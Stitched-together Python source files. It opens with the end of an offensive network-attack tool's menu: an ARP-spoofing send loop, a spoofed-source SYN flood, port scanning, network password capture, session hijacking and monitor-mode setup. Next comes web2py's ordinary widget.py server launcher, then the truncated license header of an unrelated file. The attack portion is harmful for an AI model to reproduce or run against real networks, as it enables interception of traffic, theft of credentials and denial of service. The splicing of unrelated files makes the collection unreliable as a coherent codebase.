def spcks(pck1,pck2):
send(pck1,verbose=False,inter=2)
send(pck2,verbose=False,inter=2)
threads = []
while True:
for i in range(1):
thread1 = threading.Thread(target=spcks, args=(victim_arp_packet,gateway_arp_packet))
thread1.setDaemon(True)
thread1.start()
threads.append(thread1)
for thread in threads:
thread.join()
elif(prompt == '8'):
print((c.rb+"NOTE: "+c.w+"This Only works when you are using Option #5 at the same time"))
interface = input("Network Interface: ")
ip_address = input("Target IP Address: ")
dns_traffic(interface,ip_address)
elif(prompt == '9'):
print((c.rb+"NOTE: "+c.w+"This Only works when you are using Option #5 at the same time"))
interface = input("Network Interface: ")
ip_address = input("Target IP Address: ")
http_headers(interface,ip_address)
elif(prompt == '10'):
interface = input("Network Interface: ")
ip_source = input("Desired Sender (IP Address to spoof from): ")
ip_dest = input("Target IP Address: ")
ip_source_port = 1024
ip_dest_port = input("Target Port: ")
#message = raw_input("Message to send in SYN Packet: ")
message = "A" * 300
thread_count = input("Threads: ")
print((c.w+"["+c.b+"info"+c.w+"]: Setting up..."))
subprocess.call("service network-manager restart", shell=True)
time.sleep(5)
syn_overflow(ip_source,ip_dest,ip_source_port,ip_dest_port,interface,thread_count,message)
elif(prompt == '11'):
host = input("Target Host: ")
start_ = input("Starting Port: ")
end_ = input("Ending Port: ")
if(int(start_) < 1):
print("Error. Starting port must have minimum of 1.")
if(int(end_) > 65535):
print("Error. Ending port must have a maximum of 65535.")
if(int(end_) < 65536 and int(start_) > 0):
scan_for_ports(host,int(start_),int(end_))
elif(prompt == '12'):
interface = input("Network Interface: ")
network_password_capture(interface)
elif(prompt == '13'):
interface = input("Network Interface: ")
print("Net Range example: 192.168.1.0-255")
net_range = input("Net Range: ")
gateway = input("Network gateway: ")
own_network_traffic(interface,net_range,gateway)
elif(prompt == '14'):
interface = input("Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
device = input("Device Mac: ")
extrapolate_trusted_networks(interface,device)
elif(prompt == '15'):
interface = input("Network Interface: ")
hijack_sessions(interface)
elif(prompt == '16'):
compromise_network()
elif(prompt == '17'):
interface = input("Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
networks_opprobrium(interface)
else:
print("Error. Invalid Option\nType 'help' for available commands")
|
widget.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is part of the web2py Web Framework
Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
The widget is called from web2py.
"""
import datetime
import sys
import cStringIO
import time
import thread
import threading
import os
import socket
import signal
import math
import logging
import newcron
import getpass
import gluon.main as main
from gluon.fileutils import read_file, write_file, create_welcome_w2p
from gluon.settings import global_settings
from gluon.shell import run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
datetime.datetime.now().year)
ProgramVersion = read_file('VERSION').strip()
ProgramInfo = '''%s
%s
%s''' % (ProgramName, ProgramAuthor, ProgramVersion)
if not sys.version[:3] in ['2.5', '2.6', '2.7']:
msg = 'Warning: web2py requires Python 2.5, 2.6 or 2.7 but you are running:\n%s'
msg = msg % sys.version
sys.stderr.write(msg)
logger = logging.getLogger("web2py")
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
import subprocess
major_version = sys.version_info[0]
minor_version = sys.version_info[1]
if major_version == 2:
if minor_version in (5, 6):
sys.stderr.write("Python 2.5 or 2.6\n")
ret = subprocess.call(['unit2', '-v', 'gluon.tests'])
elif minor_version in (7,):
call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests']
if options.with_coverage:
try:
import coverage
coverage_config = os.environ.get(
"COVERAGE_PROCESS_START",
os.path.join('gluon', 'tests', 'coverage.ini'))
call_args = ['coverage', 'run', '--rcfile=%s' %
coverage_config,
'-m', 'unittest', '-v', 'gluon.tests']
except:
sys.stderr.write('Coverage was not installed, skipping\n')
sys.stderr.write("Python 2.7\n")
ret = subprocess.call(call_args)
else:
sys.stderr.write("unknown python 2.x version\n")
ret = 256
else:
sys.stderr.write("Only Python 2.x supported.\n")
ret = 256
sys.exit(ret and 1)
class IO(object):
""" """
def __init__(self):
""" """
self.buffer = cStringIO.StringIO()
def write(self, data):
""" """
sys.__stdout__.write(data)
if hasattr(self, 'callback'):
self.callback(data)
else:
self.buffer.write(data)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
else:
host = host.replace('0.0.0.0', '127.0.0.1')
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
def start_browser(url, startup=False):
if startup:
print 'please visit:'
print '\t', url
print 'starting browser...'
try:
import webbrowser
webbrowser.open(url)
except:
print 'warning: unable to detect your browser'
def presentation(root):
""" Draw the splash screen """
import Tkinter
root.withdraw()
dx = root.winfo_screenwidth()
dy = root.winfo_screenheight()
dialog = Tkinter.Toplevel(root, bg='white')
dialog.geometry('%ix%i+%i+%i' % (500, 300, dx / 2 - 200, dy / 2 - 150))
dialog.overrideredirect(1)
dialog.focus_force()
canvas = Tkinter.Canvas(dialog,
background='white',
width=500,
height=300)
canvas.pack()
root.update()
logo = os.path.join('extras','icons','splashlogo.gif')
if os.path.exists(logo):
img = Tkinter.PhotoImage(file=logo)
pnl = Tkinter.Label(canvas, image=img, background='white', bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
def add_label(text='Change Me', font_size=12,
foreground='#195866', height=1):
return Tkinter.Label(
master=canvas,
width=250,
height=height,
text=text,
font=('Helvetica', font_size),
anchor=Tkinter.CENTER,
foreground=foreground,
background='white'
)
add_label('Welcome to...').pack(side='top')
add_label(ProgramName, 18, '#FF5C1F', 2).pack()
add_label(ProgramAuthor).pack()
add_label(ProgramVersion).pack()
root.update()
time.sleep(5)
dialog.destroy()
return
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
import Tkinter
import tkMessageBox
root.title('web2py server')
self.root = Tkinter.Toplevel(root)
self.options = options
self.scheduler_processes = {}
self.menu = Tkinter.Menu(self.root)
servermenu = Tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(self.options.folder, 'httpserver.log')
iconphoto = os.path.join('extras','icons','web2py.gif')
if os.path.exists(iconphoto):
img = Tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
#scheduler menu
self.schedmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
#start and register schedulers from options
self.update_schedulers(start=True)
helpmenu = Tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = Tkinter.NW
# IP
Tkinter.Label(self.root,
text='Server IP:',
justify=Tkinter.LEFT).grid(row=0,
column=0,
sticky=sticky)
self.ips = {}
self.selected_ip = Tkinter.StringVar()
row = 0
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in options.ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = Tkinter.Radiobutton(
self.root, text='%s (%s)' % (legend, ip),
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=1, sticky=sticky)
if row == 0:
self.ips[ip].select()
row += 1
shift = row
# Port
Tkinter.Label(self.root,
text='Server Port:',
justify=Tkinter.LEFT).grid(row=shift,
column=0,
sticky=sticky)
self.port_number = Tkinter.Entry(self.root)
self.port_number.insert(Tkinter.END, self.options.port)
self.port_number.grid(row=shift, column=1, sticky=sticky)
# Password
Tkinter.Label(self.root,
text='Choose Password:',
justify=Tkinter.LEFT).grid(row=shift + 1,
column=0,
sticky=sticky)
self.password = Tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=1, sticky=sticky)
# Prepare the canvas
self.canvas = Tkinter.Canvas(self.root,
width=300,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=0, columnspan=2)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = Tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=0, columnspan=2)
# Start button
self.button_start = Tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0)
# Stop button
self.button_stop = Tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
apps = []
available_apps = [arq for arq in os.listdir('applications/')]
available_apps = [arq for arq in available_apps
if os.path.exists(
'applications/%s/models/scheduler.py' % arq)]
if start:
#the widget takes care of starting the scheduler
if self.options.scheduler and self.options.with_scheduler:
apps = [app.strip() for app
in self.options.scheduler.split(',')
if app in available_apps]
for app in apps:
self.try_start_scheduler(app)
#reset the menu
self.schedmenu.delete(0, len(available_apps))
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda u = arq: self.try_start_scheduler(u)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda u = arq: self.try_stop_scheduler(u)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
def start_schedulers(self, app):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
code = "from gluon import current;current._scheduler.loop()"
print 'starting scheduler from widget for "%s"...' % app
args = (app, True, True, None, False, code)
logging.getLogger().setLevel(self.options.debuglevel)
p = Process(target=run, args=args)
self.scheduler_processes[app] = p
self.update_schedulers()
print "Currently running %s scheduler processes" % (
len(self.scheduler_processes))
p.start()
print "Processes started"
def try_stop_scheduler(self, app):
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
p.terminate()
p.join()
self.update_schedulers()
def try_start_scheduler(self, app):
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
t.start()
def checkTaskBar(self):
""" Check taskbar status """
if self.tb.status:
if self.tb.status[0] == self.tb.EnumStatus.QUIT:
self.quit()
elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif self.tb.status[0] == self.tb.EnumStatus.STOP:
self.stop()
elif self.tb.status[0] == self.tb.EnumStatus.START:
self.start()
elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
self.stop()
self.start()
del self.tb.status[0]
self.root.after(1000, self.checkTaskBar)
def update(self, text):
""" Update app text """
try:
self.text.configure(state='normal')
self.text.insert('end', text)
self.text.configure(state='disabled')
except:
pass # ## this should only happen in case app is destroyed
def connect_pages(self):
""" Connect pages """
#reset the menu
available_apps = [arq for arq in os.listdir('applications/')
if os.path.exists(
'applications/%s/__init__.py' % arq)]
self.pagesmenu.delete(0, len(available_apps))
for arq in available_apps:
url = self.url + arq
self.pagesmenu.add_command(
label=url, command=lambda u=url: start_browser(u))
def quit(self, justHide=False):
""" Finish the program execution """
if justHide:
self.root.withdraw()
else:
try:
scheds = self.scheduler_processes.keys()
for t in scheds:
self.try_stop_scheduler(t)
except:
pass
try:
newcron.stopcron()
except:
pass
try:
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Show error message """
import tkMessageBox
tkMessageBox.showerror('web2py start server', message)
def start(self):
""" Start web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except:
return self.error('invalid port number')
# Check for non default value for ssl inputs
if (len(self.options.ssl_certificate) > 0 or
len(self.options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
thread.start_new_thread(self.server.start, ())
except Exception, e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
thread.start_new_thread(
start_browser, (get_url(ip, proto=proto, port=port), True))
self.password.configure(state='readonly')
[ip.configure(state='disabled') for ip in self.ips.values()]
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stop web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
[ip.configure(state='normal') for ip in self.ips.values()]
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Update canvas """
try:
t1 = os.path.getsize('httpserver.log')
except:
self.canvas.after(1000, self.update_canvas)
return
try:
fp = open('httpserver.log', 'r')
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
fp.close()
value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
self.p0 = value
for i in xrange(len(self.p0) - 1):
c = self.canvas.coords(self.q0[i])
self.canvas.coords(self.q0[i],
(c[0],
self.p0[i],
c[2],
self.p0[i + 1]))
self.t0 = t1
except BaseException:
self.t0 = time.time()
self.t0 = t1
self.p0 = [100] * 300
self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(len(self.p0) - 1)]
self.canvas.after(1000, self.update_canvas)
def console():
""" Defines the behavior of the console web2py execution """
import optparse
import textwrap
usage = "python web2py.py"
description = """\
web2py Web Framework startup script.
ATTENTION: unless a password is specified (-a 'passwd') web2py will
attempt to run a GUI. In this case command line options are ignored."""
description = textwrap.dedent(description)
parser = optparse.OptionParser(
usage, None, optparse.Option, ProgramVersion)
parser.description = description
msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); '
'Note: This value is ignored when using the \'interfaces\' option.')
parser.add_option('-i',
'--ip',
default='127.0.0.1',
dest='ip',
help=msg)
parser.add_option('-p',
'--port',
default='8000',
dest='port',
type='int',
help='port of server (8000)')
msg = ('password to be used for administration '
'(use -a "<recycle>" to reuse the last password))')
parser.add_option('-a',
'--password',
default='<ask>',
dest='password',
help=msg)
parser.add_option('-c',
'--ssl_certificate',
default='',
dest='ssl_certificate',
help='file that contains ssl certificate')
parser.add_option('-k',
'--ssl_private_key',
default='',
dest='ssl_private_key',
help='file that contains ssl private key')
msg = ('Use this file containing the CA certificate to validate X509 '
'certificates from clients')
parser.add_option('--ca-cert',
action='store',
dest='ssl_ca_certificate',
default=None,
help=msg)
parser.add_option('-d',
'--pid_filename',
default='httpserver.pid',
dest='pid_filename',
help='file to store the pid of the server')
parser.add_option('-l',
'--log_filename',
default='httpserver.log',
dest='log_filename',
help='file to log connections')
parser.add_option('-n',
'--numthreads',
default=None,
type='int',
dest='numthreads',
help='number of threads (deprecated)')
parser.add_option('--minthreads',
default=None,
type='int',
dest='minthreads',
help='minimum number of server threads')
parser.add_option('--maxthreads',
default=None,
type='int',
dest='maxthreads',
help='maximum number of server threads')
parser.add_option('-s',
'--server_name',
default=socket.gethostname(),
dest='server_name',
help='server name for the web server')
msg = 'max number of queued requests when server unavailable'
parser.add_option('-q',
'--request_queue_size',
default='5',
type='int',
dest='request_queue_size',
help=msg)
parser.add_option('-o',
'--timeout',
default='10',
type='int',
dest='timeout',
help='timeout for individual request (10 seconds)')
parser.add_option('-z',
'--shutdown_timeout',
default='5',
type='int',
dest='shutdown_timeout',
help='timeout on shutdown of server (5 seconds)')
parser.add_option('--socket-timeout',
default=5,
type='int',
dest='socket_timeout',
help='timeout for socket (5 second)')
parser.add_option('-f',
'--folder',
default=os.getcwd(),
dest='folder',
help='folder from which to run web2py')
parser.add_option('-v',
'--verbose',
action='store_true',
dest='verbose',
default=False,
help='increase --test verbosity')
parser.add_option('-Q',
'--quiet',
action='store_true',
dest='quiet',
default=False,
help='disable all output')
msg = ('set debug output level (0-100, 0 means all, 100 means none; '
'default is 30)')
parser.add_option('-D',
'--debug',
dest='debuglevel',
default=30,
type='int',
help=msg)
msg = ('run web2py in interactive shell or IPython (if installed) with '
'specified appname (if app does not exist it will be created). '
'APPNAME like a/c/f (c,f optional)')
parser.add_option('-S',
'--shell',
dest='shell',
metavar='APPNAME',
help=msg)
msg = ('run web2py in interactive shell or bpython (if installed) with '
'specified appname (if app does not exist it will be created).\n'
'Use combined with --shell')
parser.add_option('-B',
'--bpython',
action='store_true',
default=False,
dest='bpython',
help=msg)
msg = 'only use plain python shell; should be used with --shell option'
parser.add_option('-P',
'--plain',
action='store_true',
default=False,
dest='plain',
help=msg)
msg = ('auto import model files; default is False; should be used '
'with --shell option')
parser.add_option('-M',
'--import_models',
action='store_true',
default=False,
dest='import_models',
help=msg)
msg = ('run PYTHON_FILE in web2py environment; '
'should be used with --shell option')
parser.add_option('-R',
'--run',
dest='run',
metavar='PYTHON_FILE',
default='',
help=msg)
msg = ('run scheduled tasks for the specified apps: expects a list of '
'app names as -K app1,app2,app3 '
'or a list of app:groups as -K app1:group1:group2,app2:group1 '
'to override specific group_names. (only strings, no spaces '
'allowed. Requires a scheduler defined in the models')
parser.add_option('-K',
'--scheduler',
dest='scheduler',
default=None,
help=msg)
msg = 'run schedulers alongside webserver, needs -K app1 and -a too'
parser.add_option('-X',
'--with-scheduler',
action='store_true',
default=False,
dest='with_scheduler',
help=msg)
msg = ('run doctests in web2py environment; '
'TEST_PATH like a/c/f (c,f optional)')
parser.add_option('-T',
'--test',
dest='test',
metavar='TEST_PATH',
default=None,
help=msg)
parser.add_option('-W',
'--winservice',
dest='winservice',
default='',
help='-W install|start|stop as Windows service')
msg = 'trigger a cron run manually; usually invoked from a system crontab'
parser.add_option('-C',
'--cron',
action='store_true',
dest='extcron',
default=False,
help=msg)
msg = 'triggers the use of softcron'
parser.add_option('--softcron',
action='store_true',
dest='softcron',
default=False,
help=msg)
parser.add_option('-Y',
'--run-cron',
action='store_true',
dest='runcron',
default=False,
help='start the background cron process')
parser.add_option('-J',
'--cronjob',
action='store_true',
dest='cronjob',
default=False,
help='identify cron-initiated command')
parser.add_option('-L',
'--config',
dest='config',
default='',
help='config file')
parser.add_option('-F',
'--profiler',
dest='profiler_dir',
default=None,
help='profiler dir')
parser.add_option('-t',
'--taskbar',
action='store_true',
dest='taskbar',
default=False,
help='use web2py gui and run in taskbar (system tray)')
parser.add_option('',
'--nogui',
action='store_true',
default=False,
dest='nogui',
help='text-only, no GUI')
msg = ('should be followed by a list of arguments to be passed to script, '
'to be used with -S, -A must be the last option')
parser.add_option('-A',
'--args',
action='store',
dest='args',
default=None,
help=msg)
parser.add_option('--no-banner',
action='store_true',
default=False,
dest='nobanner',
help='Do not print header banner')
msg = ('listen on multiple addresses: '
'"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." '
'(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in '
'square [] brackets)')
parser.add_option('--interfaces',
action='store',
dest='interfaces',
default=None,
help=msg)
msg = 'runs web2py tests'
parser.add_option('--run_system_tests',
action='store_true',
dest='run_system_tests',
default=False,
help=msg)
msg = ('adds coverage reporting (needs --run_system_tests), '
'python 2.7 and the coverage module installed. '
'You can alter the default path setting the environmental '
'var "COVERAGE_PROCESS_START". '
'By default it takes gluon/tests/coverage.ini')
parser.add_option('--with_coverage',
action='store_true',
dest='with_coverage',
default=False,
help=msg)
if '-A' in sys.argv:
k = sys.argv.index('-A')
elif '--args' in sys.argv:
k = sys.argv.index('--args')
else:
k = len(sys.argv)
sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:]
(options, args) = parser.parse_args()
options.args = [options.run] + other_args
global_settings.cmd_options = options
global_settings.cmd_args = args
try:
options.ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
options.ips = []
if options.run_system_tests:
run_system_tests(options)
if options.quiet:
capture = cStringIO.StringIO()
sys.stdout = capture
logger.setLevel(logging.CRITICAL + 1)
else:
logger.setLevel(options.debuglevel)
if options.config[-3:] == '.py':
options.config = options.config[:-3]
if options.cronjob:
global_settings.cronjob = True # tell the world
options.plain = True # cronjobs use a plain shell
options.nobanner = True
options.nogui = True
options.folder = os.path.abspath(options.folder)
# accept --interfaces in the form
# "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3"
# (no spaces; optional key:cert indicate SSL)
if isinstance(options.interfaces, str):
interfaces = options.interfaces.split(';')
options.interfaces = []
for interface in interfaces:
if interface.startswith('['): # IPv6
ip, if_remainder = interface.split(']', 1)
ip = ip[1:]
if_remainder = if_remainder[1:].split(':')
if_remainder[0] = int(if_remainder[0]) # numeric port
options.interfaces.append(tuple([ip] + if_remainder))
else: # IPv4
interface = interface.split(':')
interface[1] = int(interface[1]) # numeric port
options.interfaces.append(tuple(interface))
# accepts --scheduler in the form
# "app:group1,group2,app2:group1"
scheduler = []
options.scheduler_groups = None
if isinstance(options.scheduler, str):
if ':' in options.scheduler:
for opt in options.scheduler.split(','):
scheduler.append(opt.split(':'))
options.scheduler = ','.join([app[0] for app in scheduler])
options.scheduler_groups = scheduler
if options.numthreads is not None and options.minthreads is None:
options.minthreads = options.numthreads # legacy
create_welcome_w2p()
if not options.cronjob:
# If we have the applications package or if we should upgrade
if not os.path.exists('applications/__init__.py'):
write_file('applications/__init__.py', '')
return (options, args)
def check_existent_app(options, appname):
if os.path.isdir(os.path.join(options.folder, 'applications', appname)):
return True
def get_code_for_scheduler(app, options):
if len(app) == 1 or app[1] is None:
code = "from gluon import current;current._scheduler.loop()"
else:
code = "from gluon import current;current._scheduler.group_names = ['%s'];"
code += "current._scheduler.loop()"
code = code % ("','".join(app[1:]))
app_ = app[0]
if not check_existent_app(options, app_):
print "Application '%s' doesn't exist, skipping" % (app_)
return None, None
return app_, code
def start_schedulers(options):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
processes = []
apps = [(app.strip(), None) for app in options.scheduler.split(',')]
if options.scheduler_groups:
apps = options.scheduler_groups
code = "from gluon import current;current._scheduler.loop()"
logging.getLogger().setLevel(options.debuglevel)
if len(apps) == 1 and not options.with_scheduler:
app_, code = get_code_for_scheduler(apps[0], options)
if not app_:
return
print 'starting single-scheduler for "%s"...' % app_
run(app_, True, True, None, False, code)
return
for app in apps:
app_, code = get_code_for_scheduler(app, options)
if not app_:
continue
print 'starting scheduler for "%s"...' % app_
args = (app_, True, True, None, False, code)
p = Process(target=run, args=args)
processes.append(p)
print "Currently running %s scheduler processes" % (len(processes))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print "Processes started"
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print "Processes stopped"
except:
p.terminate()
p.join()
def start(cron=True):
""" Start server """
# ## get command line arguments
(options, args) = console()
if not options.nobanner:
print ProgramName
print ProgramAuthor
print ProgramVersion
from dal import DRIVERS
if not options.nobanner:
print 'Database drivers available: %s' % ', '.join(DRIVERS)
# ## if -L load options from options.config file
if options.config:
try:
options2 = __import__(options.config, {}, {}, '')
except Exception:
try:
# Jython doesn't like the extra stuff
options2 = __import__(options.config)
except Exception:
print 'Cannot import config file [%s]' % options.config
sys.exit(1)
for key in dir(options2):
if hasattr(options, key):
setattr(options, key, getattr(options2, key))
logfile0 = os.path.join('extras','examples','logging.example.conf')
if not os.path.exists('logging.conf') and os.path.exists(logfile0):
import shutil
sys.stdout.write("Copying logging.conf.example to logging.conf ... ")
shutil.copyfile('logging.example.conf', logfile0)
sys.stdout.write("OK\n")
# ## if -T run doctests (no cron)
if hasattr(options, 'test') and options.test:
test(options.test, verbose=options.verbose)
return
# ## if -S start interactive shell (also no cron)
if options.shell:
if not options.args is None:
sys.argv[:] = options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cronjob=options.cronjob)
return
# ## if -C start cron run (extcron) and exit
# ## -K specifies optional apps list (overloading scheduler)
if options.extcron:
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
if options.scheduler: # -K
apps = [app.strip() for app in options.scheduler.split(
',') if check_existent_app(options, app.strip())]
else:
apps = None
extcron = newcron.extcron(options.folder, apps=apps)
extcron.start()
extcron.join()
return
# ## if -K
if options.scheduler and not options.with_scheduler:
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
# ## if -W install/start/stop web2py as service
if options.winservice:
if os.name == 'nt':
try:
from winservice import register_service_handler, Web2pyService
register_service_handler(
argv=['', options.winservice],
opt_file=options.config,
cls=Web2pyService)
except ImportError:
print 'Error: Missing python module winservice'
sys.exit(1)
else:
print 'Error: Windows services not supported on this platform'
sys.exit(1)
return
# ## if -H cron is enabled in this *process*
# ## if --softcron use softcron
# ## use hardcron in all other cases
if cron and options.runcron and options.softcron:
print 'Using softcron (but this is not very efficient)'
global_settings.web2py_crontype = 'soft'
elif cron and options.runcron:
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder).start()
# ## if no password provided and havetk start Tk interface
# ## or start interface if we want to put in taskbar (system tray)
try:
options.taskbar
except:
options.taskbar = False
if options.taskbar and os.name != 'nt':
print 'Error: taskbar not supported on this platform'
sys.exit(1)
root = None
if not options.nogui:
try:
import Tkinter
havetk = True
except ImportError:
logger.warn(
'GUI not available because Tk library is not installed')
havetk = False
options.nogui = True
if options.password == '<ask>' and havetk or options.taskbar and havetk:
try:
root = Tkinter.Tk()
except:
pass
if root:
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
if not options.quiet:
presentation(root)
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
# ## if no tk and no password, ask for a password
if not root and options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.nobanner:
print 'no password, no admin interface'
# ##-X (if no tk, the widget takes care of it himself)
if not root and options.scheduler and options.with_scheduler:
t = threading.Thread(target=start_schedulers, args=(options,))
t.start()
# ## start server
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
(ip, port) = (options.ip, int(options.port))
else:
first_if = options.interfaces[0]
(ip, port) = first_if[0], first_if[1]
# Check for non default value for ssl inputs
if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.nobanner:
print 'please visit:'
print '\t', url
print 'use "kill -SIGTERM %i" to shutdown the web2py server' % os.getpid()
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
try:
t.join()
except:
pass
logging.shutdown()
|
nodeInterface.py
|
# ENVISIoN
#
# Copyright (c) 2019 Jesper Ericsson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
